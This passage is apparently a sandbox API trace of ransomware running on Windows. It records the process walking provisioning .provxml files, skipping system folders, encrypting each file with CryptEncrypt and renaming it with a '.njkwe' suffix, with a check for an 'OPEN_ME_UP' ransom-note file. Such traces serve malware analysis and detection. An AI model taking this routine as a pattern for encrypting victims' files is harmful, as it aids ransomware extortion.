pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\334__Connections_Cellular_T-Mobile Poland (Poland)_i0$(__MVID)@WAP.provxml") returned 168 [0078.404] StrStrIW (lpFirst="334__Connections_Cellular_T-Mobile Poland (Poland)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.404] lstrcmpW (lpString1="334__Connections_Cellular_T-Mobile Poland (Poland)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.404] lstrcmpW (lpString1="334__Connections_Cellular_T-Mobile Poland (Poland)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.404] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\334__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.404] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\334__Connections_Cellular_T-Mobile Poland (Poland)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\334__connections_cellular_t-mobile poland (poland)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.404] GetTickCount () returned 0x1153eea [0078.404] GetTickCount () returned 0x1153eea [0078.404] GetTickCount () returned 0x1153eea [0078.404] GetTickCount () returned 0x1153eea [0078.404] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.404] GetProcessHeap () returned 0xbe0000 [0078.404] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.404] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2c9, lpOverlapped=0x0) returned 1 [0078.406] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd37, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.406] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2c9, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2c9, lpOverlapped=0x0) returned 1 [0078.406] GetProcessHeap () returned 0xbe0000 [0078.406] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.406] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.406] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.406] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.406] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.406] CloseHandle (hObject=0x43c) returned 1 [0078.406] GetProcessHeap () returned 0xbe0000 [0078.407] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.407] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\334__Connections_Cellular_T-Mobile Poland (Poland)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 188 [0078.407] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\334__Connections_Cellular_T-Mobile Poland (Poland)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\334__connections_cellular_t-mobile poland (poland)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\334__Connections_Cellular_T-Mobile Poland (Poland)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\334__connections_cellular_t-mobile poland (poland)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.407] GetProcessHeap () returned 0xbe0000 [0078.407] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.407] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90c6a39e, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90c6a39e, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90c6a39e, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c7, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="335__Connections_Cellular_Optimus (Portugal)_i0$(__MVID)@WAP.provxml", cAlternateFileName="335__C~1.PRO")) returned 1 [0078.407] lstrcmpiW (lpString1="335__Connections_Cellular_Optimus (Portugal)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.407] lstrcmpiW (lpString1="335__Connections_Cellular_Optimus (Portugal)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.407] lstrcmpiW (lpString1="335__Connections_Cellular_Optimus (Portugal)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.407] lstrcmpiW (lpString1="335__Connections_Cellular_Optimus (Portugal)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.407] lstrcmpiW (lpString1="335__Connections_Cellular_Optimus (Portugal)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.407] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\335__Connections_Cellular_Optimus (Portugal)_i0$(__MVID)@WAP.provxml") returned 162 [0078.407] StrStrIW (lpFirst="335__Connections_Cellular_Optimus (Portugal)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.407] lstrcmpW (lpString1="335__Connections_Cellular_Optimus (Portugal)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.407] lstrcmpW (lpString1="335__Connections_Cellular_Optimus (Portugal)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.407] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\335__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.408] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\335__Connections_Cellular_Optimus (Portugal)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\335__connections_cellular_optimus (portugal)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.408] GetTickCount () returned 0x1153eea [0078.408] GetTickCount () returned 0x1153eea [0078.408] GetTickCount () returned 0x1153eea [0078.408] GetTickCount () returned 0x1153eea [0078.408] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.408] GetProcessHeap () returned 0xbe0000 [0078.408] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.408] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2c7, lpOverlapped=0x0) returned 1 [0078.409] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd39, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.409] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2c7, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2c7, lpOverlapped=0x0) returned 1 [0078.410] GetProcessHeap () returned 0xbe0000 [0078.410] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.410] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.410] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.410] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.410] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.410] CloseHandle (hObject=0x43c) returned 1 [0078.410] GetProcessHeap () returned 0xbe0000 [0078.410] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.410] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\335__Connections_Cellular_Optimus (Portugal)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 182 [0078.410] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\335__Connections_Cellular_Optimus (Portugal)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\335__connections_cellular_optimus (portugal)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\335__Connections_Cellular_Optimus (Portugal)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\335__connections_cellular_optimus (portugal)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.411] GetProcessHeap () returned 0xbe0000 [0078.411] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.411] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90c9060a, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90c9060a, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90c9060a, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="336__Connections_Cellular_TMN (Portugal)_i0$(__MVID)@WAP.provxml", cAlternateFileName="336__C~1.PRO")) returned 1 [0078.411] lstrcmpiW (lpString1="336__Connections_Cellular_TMN (Portugal)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.411] lstrcmpiW (lpString1="336__Connections_Cellular_TMN (Portugal)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.411] lstrcmpiW (lpString1="336__Connections_Cellular_TMN (Portugal)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.411] lstrcmpiW (lpString1="336__Connections_Cellular_TMN (Portugal)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.411] lstrcmpiW (lpString1="336__Connections_Cellular_TMN (Portugal)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.411] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\336__Connections_Cellular_TMN (Portugal)_i0$(__MVID)@WAP.provxml") returned 158 [0078.411] StrStrIW (lpFirst="336__Connections_Cellular_TMN (Portugal)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.411] lstrcmpW (lpString1="336__Connections_Cellular_TMN (Portugal)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.411] lstrcmpW (lpString1="336__Connections_Cellular_TMN (Portugal)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.411] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\336__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.411] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\336__Connections_Cellular_TMN (Portugal)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\336__connections_cellular_tmn (portugal)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.411] GetTickCount () returned 0x1153eea [0078.411] GetTickCount () returned 0x1153eea [0078.411] GetTickCount () returned 0x1153eea [0078.411] GetTickCount () returned 0x1153eea [0078.412] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.412] GetProcessHeap () returned 0xbe0000 [0078.412] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.412] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2c8, lpOverlapped=0x0) returned 1 [0078.413] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.413] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2c8, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2c8, lpOverlapped=0x0) returned 1 [0078.413] GetProcessHeap () returned 0xbe0000 [0078.413] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.414] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.414] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.414] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.414] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.414] CloseHandle (hObject=0x43c) returned 1 [0078.414] GetProcessHeap () returned 0xbe0000 [0078.414] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.414] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\336__Connections_Cellular_TMN (Portugal)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 178 [0078.414] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\336__Connections_Cellular_TMN (Portugal)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\336__connections_cellular_tmn (portugal)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\336__Connections_Cellular_TMN (Portugal)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\336__connections_cellular_tmn (portugal)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.418] GetProcessHeap () returned 0xbe0000 [0078.418] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.418] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90c9060a, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90c9060a, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90c9060a, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1cb, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="337__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", cAlternateFileName="337__C~1.PRO")) returned 1 [0078.419] lstrcmpiW (lpString1="337__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Windows") returned -1 [0078.419] lstrcmpiW (lpString1="337__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="$Recycle.bin") returned 1 [0078.419] lstrcmpiW (lpString1="337__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="System Volume Information") returned -1 [0078.419] lstrcmpiW (lpString1="337__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Program Files") returned -1 [0078.419] lstrcmpiW (lpString1="337__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Program Files (x86)") returned -1 [0078.419] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\337__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml") returned 162 [0078.419] StrStrIW (lpFirst="337__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpSrch=".njkwe") returned 0x0 [0078.419] lstrcmpW (lpString1="337__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.419] lstrcmpW (lpString1="337__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="taridd") returned -1 [0078.419] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\337__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.419] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\337__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\337__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.419] GetTickCount () returned 0x1153ef9 [0078.419] GetTickCount () returned 0x1153ef9 [0078.419] GetTickCount () returned 0x1153ef9 [0078.419] GetTickCount () returned 0x1153ef9 [0078.419] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.419] GetProcessHeap () returned 0xbe0000 [0078.419] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.419] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x1cb, lpOverlapped=0x0) returned 1 [0078.421] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe35, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.421] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x1cb, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x1cb, lpOverlapped=0x0) returned 1 [0078.421] GetProcessHeap () returned 0xbe0000 [0078.421] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.421] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.421] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.422] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.422] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.422] CloseHandle (hObject=0x43c) returned 1 [0078.422] GetProcessHeap () returned 0xbe0000 [0078.422] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.422] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\337__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml_r00t_{3sXlE5}.njkwe") returned 182 [0078.422] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\337__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\337__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\337__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\337__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.423] GetProcessHeap () returned 0xbe0000 [0078.423] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.423] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90c9060a, ftCreationTime.dwHighDateTime=0x1d2e96f, 